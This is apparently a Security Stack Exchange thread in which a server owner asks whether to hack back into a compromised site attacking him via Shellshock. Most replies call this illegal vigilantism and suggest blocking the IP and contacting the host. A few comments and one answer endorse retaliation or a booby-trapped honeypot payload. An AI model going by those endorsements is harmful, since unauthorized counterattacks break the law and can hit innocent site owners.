Should I take over a compromised website from another hacker?

Question

A website (www.blue*****art.com) is trying to attack my server using the Shellshock vulnerability. After doing an Nmap scan on the attacking IP address, I found many open ports. It looks like the website is running Exim, which is vulnerable to GHOST.

The website in question has not been maintained for the past three years (from copyright date, Twitter and Facebook status); possibly the owner passed away. A check with Sucuri shows that it is currently not blacklisted, because no malware has been found.

Should I retaliate by taking over the website from the hacker and shutting it down to stop it from scanning other people's computers?

Related: [How can I punish a hacker?](http://security.stackexchange.com/questions/35738/how-can-i-punish-a-hacker/35747#35747) — S.L. Barth, Jan 29 '15 at 15:06
Hackers usually use websites to keep on hacking. I strongly recommend you to not break into another website. — mzz, Jan 29 '15 at 15:04
Two wrongs don't make a right. You will end up being just as liable/prosecutable as the original hacker. Can you not just block this ip for now, while you report through proper channels? — geoffmcc, Jan 29 '15 at 18:38
There might be two questions mixed here. Whether that could be argued in court to be a lawful attack (as in self-defense) in whatever territory that is, could be an interesting questions, but then there's the ethical question which might also depend on the first. — Smig, Jan 29 '15 at 19:45
@Smig I'm thinking that blocking the IP address, as geoffmcc suggests, would be the digital equivalent of self-defense. — S.L. Barth, Jan 29 '15 at 21:12
@Smig it's not a particularly interesting question - AFAIK absolutely no jurisdiction anywhere has anything similar to a legal "virtual self-defense" doctrine that would allow to retailate for a cyberattack, and it would be a major news item in the field with interesting discusion if some law like that was passed anywhere. Some government agencies may be granted immunity/authorization for *attack* as such, but even then it legally doesn't matter if it's a "counterattack" or simply hacking the system for their goals. — Peteris, Jan 29 '15 at 22:44
I think the better analogy here in any case would be discovering that a thief had stolen your property, and breaking into his house to steal it back. You might have the moral high ground, but you sure as hell don't have the legal one. — sapi, Jan 30 '15 at 00:15
While I would love to grab an eyepatch and answer with a hearty "Arr!" I think that everyone here, including the OP, knows that vigilante e-justice is (almost) never a good plan. — Lilienthal, Jan 30 '15 at 12:45
@Pateris I don't disagree. I'm just trying to clarify and narrow down the question. By asking if he "should" instead of if he "could", it wasn't clear if it was going beyond the letter of the law. The legal question might have an objective answer, but the ethical question doesn't. — Smig, Jan 30 '15 at 18:10
@sapi definitely not "sure as hell". It's a thing that would make sense, and I accept that law likely doesn't usually allow that, but since it's "reasonable", I would never consider it "sure". — o0'., Jan 30 '15 at 23:29
When it is still online for 3 years, someone is paying the hosting bills. — Philipp, Jan 31 '15 at 17:08
You mean like [Code Green](http://w.spyware32.com/170/11525/IISWormCodeGreen.html)? And [nematodes](http://virus.wikidot.com/nematode) in general. — Ben Voigt, Feb 01 '15 at 00:39
@sapi Your analogy doesn't work. Getting your stuff back from a thief isn't theft because theft is, by definition, taking something that doesn't belong to you. In a jurisdiction where trespass is a civil matter and, as long as you didn't damage anything or take anything other than your property, I don't think you'd be committing any kind of crime. — David Richerby, Feb 01 '15 at 19:40
Legally you cannot hack the website. Morally, though, I would not feel guilty for hacking a server that is trying to hack mine. Here's how I view it: hacking a website that is actively hacking you is comparable to self defense if somebody is attacking you. A judge may not agree with that, but is the hacker going to go to the police because he got hacked and kicked off of a machine? Not likely. It's a tough decision with many different viewing angles, but I suppose if you view the situation black-and-white, then it is illegal to do it. — Spencer D, Feb 01 '15 at 20:03

S.L. Barth · Answer 1 · 2015-01-29T15:14:46.937

87

Not if you want to stay out of trouble.

What you are suggesting is vigilante action, and most legal systems do not look kindly upon that. Even though you may feel you are protecting other, less tech-savvy people, it would probably still constitute a crime.

What you could do, is try and find out if there are authorities to warn. This could be the hosting provider, the registrar, or the police of the country where the website is hosted. Or, if you believe the site has been hijacked, find either the owner or their remaining relatives.

edited Jan 29 '15 at 15:14

answered Jan 29 '15 at 15:05

S.L. Barth

5,486
8
38
47

1

Is it vigilante action? Or self defense? – corsiKa Jan 30 '15 at 14:55
30

@corsiKa It is vigilante action. For self defense, it is sufficient to block the IP address until the situation is resolved. – S.L. Barth Jan 30 '15 at 14:58
3

@S.L.Barth Blocking an IP address will protect you from everything from that IP address except from bandwidth consumption. It's possible that there are situations where that bandwidth consumption is a problem, and there might be something one could do to the sender, which would cause the stream of packets to stop. But it is rarely a good idea to take such actions. – kasperd Jan 31 '15 at 18:18
2

@kasperd, yes, you could for example "tarpit" its connections. Depending on the scanning method and system, this could even bring down the attacker's machine due to resource exhaustion. – LSerni Jan 31 '15 at 23:01

kasperd · Answer 2 · 2015-01-30T17:56:53.200

66

You should contact the hosting provider, their contact information can be found by a whois lookup of the IP address of the server. You should give the hosting provider logs with the evidence that the attacks originated from that IP.

The hosting provider can inspect network traffic to find out if any attacks is still ongoing and take the host offline if necessary.

edited Jan 30 '15 at 17:56

answered Jan 29 '15 at 16:32

kasperd

5,402
1
19
38

5

I'm sure someone who knows about Shell Shock, sucuri, GHOST and Exim, also knows how "their contact information can be found" and that they "should give the hosting provider logs with the evidence that the attacks originated from that IP". – Dan Dascalescu Jan 31 '15 at 21:15

score 38 · Answer 3 · edited Jan 30 '15 at 14:54

Many times the attacking website has no clue their site is attacking. I own a hosting company, and we're typically notified through our abuse email from the attacked.

Upon investigation, we either find

World writable folder where rogue scanning scripts have been installed
poorly created websites that allow unrestricted uploading
compromised FTP accounts.

In most, if not all cases, our clients had no clue.

Other than that it's illegal/unethical to retaliate.

score 2 · Answer 4 · edited Feb 01 '15 at 01:48

If someone were attacking you in real life you would have options:

Run
Defend yourself

I would say that this is a similar situation. If you put the right countermeasures in place and feel that the hacker is going to attempt at all costs to hack your server, I would say you are left with no other option but to defend at all costs, or lock up the castle and call for help.

Explore your options.

Law enforcement
Internet authorities
Shutting down the site
Taking over the site
etc.

I would say that if you take over or shut down the site, that this hacker may (probably will) retaliate against you.

You should

Collect logs
Get information on the hacker
IP address, etc. - stuff you can do passively
Contact authorities

Law enforcement and Internet authorities have resources that you may or may not have. They are prepared for these kinds of attacks and the retaliation that comes with tracking them down.

You don't know who is hacking you or how much resources they have at their disposal.

So, unless you are something like a Penelope Garcia, I wouldn't recommend going toe-to-toe with a hacker in his own neighborhood.

@schroeder, I think that falls under `etc.`, doesn't it? I know that I didn't really hint into that direction. blocking IP's is a never ending battle if the Hacker is insistent on attacking your system, they may have access to other IPs or can spoof their IP. — Malachi, Jan 30 '15 at 14:15

score -3 · Answer 5 · answered Jan 30 '15 at 23:40

-3

Obviously the safest bet would be to do what most of the responders have already suggested, logging and notifying the appropriate resources to get it shut down...but that's no fun is it?

Should the ongoing attacks be of the active sort as opposed to automated botnet types of attacks (which sounds closer to what you are dealing with...and I have little familiarity with this particular vulnerability), where a live attacker's goal is to penetrate your system and perhaps take something valuable, then I've cough cough played with the idea of retaliating with a BearTrap (think honeypot leading to a disguised malicious payload). Legally, that's a little less straight forward now isn't it versus an active takeover action...although much more sophisticated.

If you break into my house, steal my safe and upon cracking it open it explodes in your face then, hey...

Of course this probably invites greater, more motivated retaliation in the end...but the moral and legal lines are much more blurred...

answered Jan 30 '15 at 23:40

AgonyOfVictory

15

12

If you booby-trap a safe and it blows up in a would-be safecracker's face, you'll be charged with, and probably convicted of, attempted murder. Self-defense is restricted to what is known as "reasonable force", and only in the presence of an immediate threat. Blowing up a safecracker fails both tests, as does counter-hacking an attacker. – Mark Jan 31 '15 at 00:09
the legality issue related to the creation of a honeypot not the safe ANALOGY...I thought that would be obvious but apparently not to all. I don't think putting a bomb in a safe that explodes upon opening would solve anything. To be clear I'm referring to the idea of someone stealing something that might not be as beneficial as they believe. You would need to hire the worse lawyer to – AgonyOfVictory Feb 02 '15 at 16:20
I see it very difficult to prove any intent to do harm from stolen, "experimental" code...that's some Minority Report type shit... – AgonyOfVictory Feb 02 '15 at 16:39
No one cares about your code, and even if they do, it's the source code they want, not binaries. The chance of someone running your malicious code on their machine is slim at best. More likely, they'll be running it on *your* machine -- since what they're generally after is the ability to launch future attacks against third parties anonymously and without taking up their own bandwidth and CPU. – cHao Feb 03 '15 at 10:54
Probably true, but it's not unheard of & technically possible. All intrusions aren't the same, I wouldn't overestimate the avg. attacker's sophistication either...**Honeypot Stings Attackers With Counterattacks** : http://www.darkreading.com/vulnerabilities---threats/honeypot-stings-attackers-with-counterattacks/d/d-id/1139424? "aggressive and offensive honeypots are a controversial concept and the legal ramifications are tricky. Sintsov, who presented his honeypot experiment fndings at Blck Ht Europe this month in Amsterdam, says the legal issues are up for interpretation..." – AgonyOfVictory Feb 04 '15 at 17:08

Should I take over a compromised website from another hacker?

5 Answers5

Linked